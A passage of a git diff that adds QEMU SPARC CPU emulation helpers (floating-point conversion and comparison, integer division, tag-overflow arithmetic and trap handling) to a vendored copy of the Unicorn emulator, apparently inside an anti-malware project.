ret = int64_to_float64(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fxtoq(CPUSPARCState *env, int64_t src) +{ + /* No possible exceptions converting long long to long double. */ + QT0 = int64_to_float128(src, &env->fp_status); +} +#endif +#undef F_HELPER + +/* floating point conversion */ +float32 helper_fdtos(CPUSPARCState *env, float64 src) +{ + float32 ret; + clear_float_exceptions(env); + ret = float64_to_float32(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fstod(CPUSPARCState *env, float32 src) +{ + float64 ret; + clear_float_exceptions(env); + ret = float32_to_float64(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float32 helper_fqtos(CPUSPARCState *env) +{ + float32 ret; + clear_float_exceptions(env); + ret = float128_to_float32(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fstoq(CPUSPARCState *env, float32 src) +{ + clear_float_exceptions(env); + QT0 = float32_to_float128(src, &env->fp_status); + check_ieee_exceptions(env); +} + +float64 helper_fqtod(CPUSPARCState *env) +{ + float64 ret; + clear_float_exceptions(env); + ret = float128_to_float64(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fdtoq(CPUSPARCState *env, float64 src) +{ + clear_float_exceptions(env); + QT0 = float64_to_float128(src, &env->fp_status); + check_ieee_exceptions(env); +} + +/* Float to integer conversion. */ +int32_t helper_fstoi(CPUSPARCState *env, float32 src) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float32_to_int32_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int32_t helper_fdtoi(CPUSPARCState *env, float64 src) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float64_to_int32_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int32_t helper_fqtoi(CPUSPARCState *env) +{ + int32_t ret; + clear_float_exceptions(env); + ret = float128_to_int32_round_to_zero(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +#ifdef TARGET_SPARC64 +int64_t helper_fstox(CPUSPARCState *env, float32 src) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float32_to_int64_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int64_t helper_fdtox(CPUSPARCState *env, float64 src) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float64_to_int64_round_to_zero(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +int64_t helper_fqtox(CPUSPARCState *env) +{ + int64_t ret; + clear_float_exceptions(env); + ret = float128_to_int64_round_to_zero(QT1, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} +#endif + +float32 helper_fabss(float32 src) +{ + return float32_abs(src); +} + +#ifdef TARGET_SPARC64 +float64 helper_fabsd(float64 src) +{ + return float64_abs(src); +} + +void helper_fabsq(CPUSPARCState *env) +{ + QT0 = float128_abs(QT1); +} +#endif + +float32 helper_fsqrts(CPUSPARCState *env, float32 src) +{ + float32 ret; + clear_float_exceptions(env); + ret = float32_sqrt(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +float64 helper_fsqrtd(CPUSPARCState *env, float64 src) +{ + float64 ret; + clear_float_exceptions(env); + ret = float64_sqrt(src, &env->fp_status); + check_ieee_exceptions(env); + return ret; +} + +void helper_fsqrtq(CPUSPARCState *env) +{ + clear_float_exceptions(env); + QT0 = float128_sqrt(QT1, &env->fp_status); + check_ieee_exceptions(env); +} + +#define GEN_FCMP(name, size, reg1, reg2, FS, E) \ + void glue(helper_, name) (CPUSPARCState *env) \ + { \ + int ret; \ + clear_float_exceptions(env); \ + if (E) { \ + ret = glue(size, _compare)(reg1, reg2, &env->fp_status); \ + } else { \ + ret = glue(size, _compare_quiet)(reg1, reg2, \ + &env->fp_status); \ + } \ + check_ieee_exceptions(env); \ + switch (ret) { \ + case float_relation_unordered: \ + env->fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ + env->fsr |= FSR_NVA; \ + break; \ + case float_relation_less: \ + env->fsr &= ~(FSR_FCC1) << FS; \ + env->fsr |= FSR_FCC0 << FS; \ + break; \ + case float_relation_greater: \ + env->fsr &= ~(FSR_FCC0) << FS; \ + env->fsr |= FSR_FCC1 << FS; \ + break; \ + default: \ + env->fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ + break; \ + } \ + } +#define GEN_FCMP_T(name, size, FS, E) \ + void glue(helper_, name)(CPUSPARCState *env, size src1, size src2) \ + { \ + int ret; \ + clear_float_exceptions(env); \ + if (E) { \ + ret = glue(size, _compare)(src1, src2, &env->fp_status); \ + } else { \ + ret = glue(size, _compare_quiet)(src1, src2, \ + &env->fp_status); \ + } \ + check_ieee_exceptions(env); \ + switch (ret) { \ + case float_relation_unordered: \ + env->fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ + break; \ + case float_relation_less: \ + env->fsr &= ~(FSR_FCC1 << FS); \ + env->fsr |= FSR_FCC0 << FS; \ + break; \ + case float_relation_greater: \ + env->fsr &= ~(FSR_FCC0 << FS); \ + env->fsr |= FSR_FCC1 << FS; \ + break; \ + default: \ + env->fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ + break; \ + } \ + } + +GEN_FCMP_T(fcmps, float32, 0, 0); +GEN_FCMP_T(fcmpd, float64, 0, 0); + +GEN_FCMP_T(fcmpes, float32, 0, 1); +GEN_FCMP_T(fcmped, float64, 0, 1); + +GEN_FCMP(fcmpq, float128, QT0, QT1, 0, 0); +GEN_FCMP(fcmpeq, float128, QT0, QT1, 0, 1); + +#ifdef TARGET_SPARC64 +GEN_FCMP_T(fcmps_fcc1, float32, 22, 0); +GEN_FCMP_T(fcmpd_fcc1, float64, 22, 0); +GEN_FCMP(fcmpq_fcc1, float128, QT0, QT1, 22, 0); + +GEN_FCMP_T(fcmps_fcc2, float32, 24, 0); +GEN_FCMP_T(fcmpd_fcc2, float64, 24, 0); +GEN_FCMP(fcmpq_fcc2, float128, QT0, QT1, 24, 0); + +GEN_FCMP_T(fcmps_fcc3, float32, 26, 0); +GEN_FCMP_T(fcmpd_fcc3, float64, 26, 0); +GEN_FCMP(fcmpq_fcc3, float128, QT0, QT1, 26, 0); + +GEN_FCMP_T(fcmpes_fcc1, float32, 22, 1); +GEN_FCMP_T(fcmped_fcc1, float64, 22, 1); +GEN_FCMP(fcmpeq_fcc1, float128, QT0, QT1, 22, 1); + +GEN_FCMP_T(fcmpes_fcc2, float32, 24, 1); +GEN_FCMP_T(fcmped_fcc2, float64, 24, 1); +GEN_FCMP(fcmpeq_fcc2, float128, QT0, QT1, 24, 1); + +GEN_FCMP_T(fcmpes_fcc3, float32, 26, 1); +GEN_FCMP_T(fcmped_fcc3, float64, 26, 1); +GEN_FCMP(fcmpeq_fcc3, float128, QT0, QT1, 26, 1); +#endif +#undef GEN_FCMP_T +#undef GEN_FCMP + +static inline void set_fsr(CPUSPARCState *env) +{ + int rnd_mode; + + switch (env->fsr & FSR_RD_MASK) { + case FSR_RD_NEAREST: + rnd_mode = float_round_nearest_even; + break; + default: + case FSR_RD_ZERO: + rnd_mode = float_round_to_zero; + break; + case FSR_RD_POS: + rnd_mode = float_round_up; + break; + case FSR_RD_NEG: + rnd_mode = float_round_down; + break; + } + set_float_rounding_mode(rnd_mode, &env->fp_status); +} + +void helper_ldfsr(CPUSPARCState *env, uint32_t new_fsr) +{ + env->fsr = (new_fsr & FSR_LDFSR_MASK) | (env->fsr & FSR_LDFSR_OLDMASK); + set_fsr(env); +} + +#ifdef TARGET_SPARC64 +void helper_ldxfsr(CPUSPARCState *env, uint64_t new_fsr) +{ + env->fsr = (new_fsr & FSR_LDXFSR_MASK) | (env->fsr & FSR_LDXFSR_OLDMASK); + set_fsr(env); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c new file mode 100644 index 0000000..602a819 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.c @@ -0,0 +1,255 @@ +/* + * Misc Sparc helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" +#include "sysemu/sysemu.h" + +void helper_raise_exception(CPUSPARCState *env, int tt) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +void helper_debug(CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->exception_index = EXCP_DEBUG; + cpu_loop_exit(cs); +} + +#ifdef TARGET_SPARC64 +target_ulong helper_popc(target_ulong val) +{ + return ctpop64(val); +} + +void helper_tick_set_count(void *opaque, uint64_t count) +{ +#if !defined(CONFIG_USER_ONLY) + // cpu_tick_set_count(opaque, count); +#endif +} + +uint64_t helper_tick_get_count(void *opaque) +{ +#if !defined(CONFIG_USER_ONLY) + return 0; //cpu_tick_get_count(opaque); +#else + return 0; +#endif +} + +void helper_tick_set_limit(void *opaque, uint64_t limit) +{ +#if !defined(CONFIG_USER_ONLY) + // cpu_tick_set_limit(opaque, limit); +#endif +} +#endif + +static target_ulong helper_udiv_common(CPUSPARCState *env, target_ulong a, + target_ulong b, int cc) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + int overflow = 0; + uint64_t x0; + uint32_t x1; + + x0 = (a & 0xffffffff) | ((uint64_t) (env->y) << 32); + x1 = (b & 0xffffffff); + + if (x1 == 0) { + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } + + x0 = x0 / x1; + if (x0 > UINT32_MAX) { + x0 = UINT32_MAX; + overflow = 1; + } + + if (cc) { + env->cc_dst = x0; + env->cc_src2 = overflow; + env->cc_op = CC_OP_DIV; + } + return x0; +} + +target_ulong helper_udiv(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_udiv_common(env, a, b, 0); +} + +target_ulong helper_udiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_udiv_common(env, a, b, 1); +} + +static target_ulong helper_sdiv_common(CPUSPARCState *env, target_ulong a, + target_ulong b, int cc) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + int overflow = 0; + int64_t x0; + int32_t x1; + + x0 = (a & 0xffffffff) | ((uint64_t) (env->y) << 32); + x1 = (b & 0xffffffff); + + if (x1 == 0) { + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } else if (x1 == -1 && x0 == INT64_MIN) { + x0 = INT32_MAX; + overflow = 1; + } else { + x0 = x0 / x1; + if ((int32_t) x0 != x0) { + x0 = x0 < 0 ? INT32_MIN : INT32_MAX; + overflow = 1; + } + } + + if (cc) { + env->cc_dst = x0; + env->cc_src2 = overflow; + env->cc_op = CC_OP_DIV; + } + return x0; +} + +target_ulong helper_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_sdiv_common(env, a, b, 0); +} + +target_ulong helper_sdiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) +{ + return helper_sdiv_common(env, a, b, 1); +} + +#ifdef TARGET_SPARC64 +int64_t helper_sdivx(CPUSPARCState *env, int64_t a, int64_t b) +{ + if (b == 0) { + /* Raise divide by zero trap. */ + SPARCCPU *cpu = sparc_env_get_cpu(env); + + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } else if (b == -1) { + /* Avoid overflow trap with i386 divide insn. */ + return -a; + } else { + return a / b; + } +} + +uint64_t helper_udivx(CPUSPARCState *env, uint64_t a, uint64_t b) +{ + if (b == 0) { + /* Raise divide by zero trap. */ + SPARCCPU *cpu = sparc_env_get_cpu(env); + + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_DIV_ZERO); + } + return a / b; +} +#endif + +target_ulong helper_taddcctv(CPUSPARCState *env, target_ulong src1, + target_ulong src2) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + target_ulong dst; + + /* Tag overflow occurs if either input has bits 0 or 1 set. */ + if ((src1 | src2) & 3) { + goto tag_overflow; + } + + dst = src1 + src2; + + /* Tag overflow occurs if the addition overflows. */ + if (~(src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { + goto tag_overflow; + } + + /* Only modify the CC after any exceptions have been generated. */ + env->cc_op = CC_OP_TADDTV; + env->cc_src = src1; + env->cc_src2 = src2; + env->cc_dst = dst; + return dst; + + tag_overflow: + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_TOVF); +} + +target_ulong helper_tsubcctv(CPUSPARCState *env, target_ulong src1, + target_ulong src2) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + target_ulong dst; + + /* Tag overflow occurs if either input has bits 0 or 1 set. */ + if ((src1 | src2) & 3) { + goto tag_overflow; + } + + dst = src1 - src2; + + /* Tag overflow occurs if the subtraction overflows. */ + if ((src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { + goto tag_overflow; + } + + /* Only modify the CC after any exceptions have been generated. */ + env->cc_op = CC_OP_TSUBTV; + env->cc_src = src1; + env->cc_src2 = src2; + env->cc_dst = dst; + return dst; + + tag_overflow: + cpu_restore_state(CPU(cpu), GETPC()); + helper_raise_exception(env, TT_TOVF); +} + +//#ifndef TARGET_SPARC64 +void helper_power_down(CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + cs->halted = 1; + cs->exception_index = EXCP_HLT; + env->pc = env->npc; + env->npc = env->pc + 4; + cpu_loop_exit(cs); +} +//#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h new file mode 100644 index 0000000..503e1e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/helper.h @@ -0,0 +1,177 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) +DEF_HELPER_1(power_down, void, env) + +#ifndef TARGET_SPARC64 +DEF_HELPER_1(rett, void, env) +DEF_HELPER_2(wrpsr, void, env, tl) +DEF_HELPER_1(rdpsr, tl, env) +#else +DEF_HELPER_2(wrpil, void, env, tl) +DEF_HELPER_2(wrpstate, void, env, tl) +DEF_HELPER_1(done, void, env) +DEF_HELPER_1(retry, void, env) +DEF_HELPER_1(flushw, void, env) +DEF_HELPER_1(saved, void, env) +DEF_HELPER_1(restored, void, env) +DEF_HELPER_1(rdccr, tl, env) +DEF_HELPER_2(wrccr, void, env, tl) +DEF_HELPER_1(rdcwp, tl, env) +DEF_HELPER_2(wrcwp, void, env, tl) +DEF_HELPER_FLAGS_2(array8, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_1(popc, tl, tl) +DEF_HELPER_4(ldda_asi, void, env, tl, int, int) +DEF_HELPER_5(ldf_asi, void, env, tl, int, int, int) +DEF_HELPER_5(stf_asi, void, env, tl, int, int, int) +DEF_HELPER_5(casx_asi, tl, env, tl, tl, tl, i32) +DEF_HELPER_2(set_softint, void, env, i64) +DEF_HELPER_2(clear_softint, void, env, i64) +DEF_HELPER_2(write_softint, void, env, i64) +DEF_HELPER_2(tick_set_count, void, ptr, i64) +DEF_HELPER_1(tick_get_count, i64, ptr) +DEF_HELPER_2(tick_set_limit, void, ptr, i64) +#endif +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +DEF_HELPER_5(cas_asi, tl, env, tl, tl, tl, i32) +#endif +DEF_HELPER_3(check_align, void, env, tl, i32) +DEF_HELPER_1(debug, void, env) +DEF_HELPER_1(save, void, env) +DEF_HELPER_1(restore, void, env) +DEF_HELPER_3(udiv, tl, env, tl, tl) +DEF_HELPER_3(udiv_cc, tl, env, tl, tl) +DEF_HELPER_3(sdiv, tl, env, tl, tl) +DEF_HELPER_3(sdiv_cc, tl, env, tl, tl) +DEF_HELPER_3(taddcctv, tl, env, tl, tl) +DEF_HELPER_3(tsubcctv, tl, env, tl, tl) +#ifdef TARGET_SPARC64 +DEF_HELPER_3(sdivx, s64, env, s64, s64) +DEF_HELPER_3(udivx, i64, env, i64, i64) +#endif +DEF_HELPER_3(ldqf, void, env, tl, int) +DEF_HELPER_3(stqf, void, env, tl, int) +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +DEF_HELPER_5(ld_asi, i64, env, tl, int, int, int) +DEF_HELPER_5(st_asi, void, env, tl, i64, int, int) +#endif +DEF_HELPER_2(ldfsr, void, env, i32) +DEF_HELPER_FLAGS_1(fabss, TCG_CALL_NO_RWG_SE, f32, f32) +DEF_HELPER_2(fsqrts, f32, env, f32) +DEF_HELPER_2(fsqrtd, f64, env, f64) +DEF_HELPER_3(fcmps, void, env, f32, f32) +DEF_HELPER_3(fcmpd, void, env, f64, f64) +DEF_HELPER_3(fcmpes, void, env, f32, f32) +DEF_HELPER_3(fcmped, void, env, f64, f64) +DEF_HELPER_1(fsqrtq, void, env) +DEF_HELPER_1(fcmpq, void, env) +DEF_HELPER_1(fcmpeq, void, env) +#ifdef TARGET_SPARC64 +DEF_HELPER_2(ldxfsr, void, env, i64) +DEF_HELPER_FLAGS_1(fabsd, TCG_CALL_NO_RWG_SE, f64, f64) +DEF_HELPER_3(fcmps_fcc1, void, env, f32, f32) +DEF_HELPER_3(fcmps_fcc2, void, env, f32, f32) +DEF_HELPER_3(fcmps_fcc3, void, env, f32, f32) +DEF_HELPER_3(fcmpd_fcc1, void, env, f64, f64) +DEF_HELPER_3(fcmpd_fcc2, void, env, f64, f64) +DEF_HELPER_3(fcmpd_fcc3, void, env, f64, f64) +DEF_HELPER_3(fcmpes_fcc1, void, env, f32, f32) +DEF_HELPER_3(fcmpes_fcc2, void, env, f32, f32) +DEF_HELPER_3(fcmpes_fcc3, void, env, f32, f32) +DEF_HELPER_3(fcmped_fcc1, void, env, f64, f64) +DEF_HELPER_3(fcmped_fcc2, void, env, f64, f64) +DEF_HELPER_3(fcmped_fcc3, void, env, f64, f64) +DEF_HELPER_1(fabsq, void, env) +DEF_HELPER_1(fcmpq_fcc1, void, env) +DEF_HELPER_1(fcmpq_fcc2, void, env) +DEF_HELPER_1(fcmpq_fcc3, void, env) +DEF_HELPER_1(fcmpeq_fcc1, void, env) +DEF_HELPER_1(fcmpeq_fcc2, void, env) +DEF_HELPER_1(fcmpeq_fcc3, void, env) +#endif +DEF_HELPER_2(raise_exception, noreturn, env, int) +#define F_HELPER_0_1(name) DEF_HELPER_1(f ## name, void, env) + +DEF_HELPER_3(faddd, f64, env, f64, f64) +DEF_HELPER_3(fsubd, f64, env, f64, f64) +DEF_HELPER_3(fmuld, f64, env, f64, f64) +DEF_HELPER_3(fdivd, f64, env, f64, f64) +F_HELPER_0_1(addq) +F_HELPER_0_1(subq) +F_HELPER_0_1(mulq) +F_HELPER_0_1(divq) + +DEF_HELPER_3(fadds, f32, env, f32, f32) +DEF_HELPER_3(fsubs, f32, env, f32, f32) +DEF_HELPER_3(fmuls, f32, env, f32, f32) +DEF_HELPER_3(fdivs, f32, env, f32, f32) + +DEF_HELPER_3(fsmuld, f64, env, f32, f32) +DEF_HELPER_3(fdmulq, void, env, f64, f64) + +DEF_HELPER_FLAGS_1(fnegs, TCG_CALL_NO_RWG_SE, f32, f32) +DEF_HELPER_2(fitod, f64, env, s32) +DEF_HELPER_2(fitoq, void, env, s32) + +DEF_HELPER_2(fitos, f32, env, s32) + +#ifdef TARGET_SPARC64 +DEF_HELPER_FLAGS_1(fnegd, TCG_CALL_NO_RWG_SE, f64, f64) +DEF_HELPER_1(fnegq, void, env) +DEF_HELPER_2(fxtos, f32, env, s64) +DEF_HELPER_2(fxtod, f64, env, s64) +DEF_HELPER_2(fxtoq, void, env, s64) +#endif +DEF_HELPER_2(fdtos, f32, env, f64) +DEF_HELPER_2(fstod, f64, env, f32) +DEF_HELPER_1(fqtos, f32, env) +DEF_HELPER_2(fstoq, void, env, f32) +DEF_HELPER_1(fqtod, f64, env) +DEF_HELPER_2(fdtoq, void, env, f64) +DEF_HELPER_2(fstoi, s32, env, f32) +DEF_HELPER_2(fdtoi, s32, env, f64) +DEF_HELPER_1(fqtoi, s32, env) +#ifdef TARGET_SPARC64 +DEF_HELPER_2(fstox, s64, env, f32) +DEF_HELPER_2(fdtox, s64, env, f64) +DEF_HELPER_1(fqtox, s64, env) + +DEF_HELPER_FLAGS_2(fpmerge, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16al, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8x16au, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmul8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmuld8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmuld8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fexpand, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_3(pdist, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +DEF_HELPER_FLAGS_2(fpack16, TCG_CALL_NO_RWG_SE, i32, i64, i64) +DEF_HELPER_FLAGS_3(fpack32, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +DEF_HELPER_FLAGS_2(fpackfix, TCG_CALL_NO_RWG_SE, i32, i64, i64) +DEF_HELPER_FLAGS_3(bshuffle, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +#define VIS_HELPER(name) \ + DEF_HELPER_FLAGS_2(f ## name ## 16, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f ## name ## 16s, TCG_CALL_NO_RWG_SE, \ + i32, i32, i32) \ + DEF_HELPER_FLAGS_2(f ## name ## 32, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f ## name ## 32s, TCG_CALL_NO_RWG_SE, \ + i32, i32, i32) + +VIS_HELPER(padd) +VIS_HELPER(psub) +#define VIS_CMPHELPER(name) \ + DEF_HELPER_FLAGS_2(f##name##16, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f##name##32, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) +VIS_CMPHELPER(cmpgt) +VIS_CMPHELPER(cmpeq) +VIS_CMPHELPER(cmple) +VIS_CMPHELPER(cmpne) +#endif +#undef F_HELPER_0_1 +#undef VIS_HELPER +#undef VIS_CMPHELPER +DEF_HELPER_1(compute_psr, void, env) +DEF_HELPER_1(compute_C_icc, i32, env) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c new file mode 100644 index 0000000..4a34a71 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c @@ -0,0 +1,95 @@ +/* + * Sparc32 interrupt helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "sysemu/sysemu.h" + + +void sparc_cpu_do_interrupt(CPUState *cs) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int cwp, intno = cs->exception_index; + + /* Compute PSR before exposing state. */ + if (env->cc_op != CC_OP_FLAGS) { + cpu_get_psr(env); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->psret == 0) { + if (cs->exception_index == 0x80 && + env->def->features & CPU_FEATURE_TA0_SHUTDOWN) { + qemu_system_shutdown_request(); + } else { + cpu_abort(cs, "Trap 0x%02x while interrupts disabled, Error state", + cs->exception_index); + } + return; + } +#endif + env->psret = 0; + cwp = cpu_cwp_dec(env, env->cwp - 1); + cpu_set_cwp(env, cwp); + env->regwptr[9] = env->pc; + env->regwptr[10] = env->npc; + env->psrps = env->psrs; + env->psrs = 1; + env->tbr = (env->tbr & TBR_BASE_MASK) | (intno << 4); + env->pc = env->tbr; + env->npc = env->pc + 4; + cs->exception_index = -1; +} + +#if !defined(CONFIG_USER_ONLY) +static void leon3_cache_control_int(CPUSPARCState *env) +{ + uint32_t state = 0; + + if (env->cache_control & CACHE_CTRL_IF) { + /* Instruction cache state */ + state = env->cache_control & CACHE_STATE_MASK; + if (state == CACHE_ENABLED) { + state = CACHE_FROZEN; + //trace_int_helper_icache_freeze(); + } + + env->cache_control &= ~CACHE_STATE_MASK; + env->cache_control |= state; + } + + if (env->cache_control & CACHE_CTRL_DF) { + /* Data cache state */ + state = (env->cache_control >> 2) & CACHE_STATE_MASK; + if (state == CACHE_ENABLED) { + state = CACHE_FROZEN; + //trace_int_helper_dcache_freeze(); + } + + env->cache_control &= ~(CACHE_STATE_MASK << 2); + env->cache_control |= (state << 2); + } +} + +void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno) +{ + //leon3_irq_ack(irq_manager, intno); + leon3_cache_control_int(env); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c new file mode 100644 index 0000000..7eba49c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c @@ -0,0 +1,128 @@ +/* + * Sparc64 interrupt helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + + +void sparc_cpu_do_interrupt(CPUState *cs) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int intno = cs->exception_index; + trap_state *tsptr; + + /* Compute PSR before exposing state. */ + if (env->cc_op != CC_OP_FLAGS) { + cpu_get_psr(env); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->tl >= env->maxtl) { + cpu_abort(cs, "Trap 0x%04x while trap level (%d) >= MAXTL (%d)," + " Error state", cs->exception_index, env->tl, env->maxtl); + return; + } +#endif + if (env->tl < env->maxtl - 1) { + env->tl++; + } else { + env->pstate |= PS_RED; + if (env->tl < env->maxtl) { + env->tl++; + } + } + tsptr = cpu_tsptr(env); + + tsptr->tstate = (cpu_get_ccr(env) << 32) | + ((env->asi & 0xff) << 24) | ((env->pstate & 0xf3f) << 8) | + cpu_get_cwp64(env); + tsptr->tpc = env->pc; + tsptr->tnpc = env->npc; + tsptr->tt = intno; + + switch (intno) { + case TT_IVEC: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_IG); + break; + case TT_TFAULT: + case TT_DFAULT: + case TT_TMISS: case TT_TMISS+1: case TT_TMISS+2: case TT_TMISS+3: + case TT_DMISS: case TT_DMISS+1: case TT_DMISS+2: case TT_DMISS+3: + case TT_DPROT: case TT_DPROT+1: case TT_DPROT+2: case TT_DPROT+3: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_MG); + break; + default: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_AG); + break; + } + + if (intno == TT_CLRWIN) { + cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - 1)); + } else if ((intno & 0x1c0) == TT_SPILL) { + cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - env->cansave - 2)); + } else if ((intno & 0x1c0) == TT_FILL) { + cpu_set_cwp(env, cpu_cwp_inc(env, env->cwp + 1)); + } + env->tbr &= ~0x7fffULL; + env->tbr |= ((env->tl > 1) ? 1 << 14 : 0) | (intno << 5); + env->pc = env->tbr; + env->npc = env->pc + 4; + cs->exception_index = -1; +} + +trap_state *cpu_tsptr(CPUSPARCState* env) +{ + return &env->ts[env->tl & MAXTL_MASK]; +} + +static bool do_modify_softint(CPUSPARCState *env, uint32_t value) +{ + if (env->softint != value) { + env->softint = value; +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + //cpu_check_irqs(env); + } +#endif + return true; + } + return false; +} + +void helper_set_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, env->softint | (uint32_t)value)) { + 